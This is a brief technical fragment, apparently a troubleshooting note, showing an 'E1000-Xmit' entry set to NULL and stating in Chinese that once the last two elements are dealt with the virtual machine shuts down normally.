; After: "E1000-Xmit" -> NULL
处理掉最后两个元素后虚拟机即可正常关机。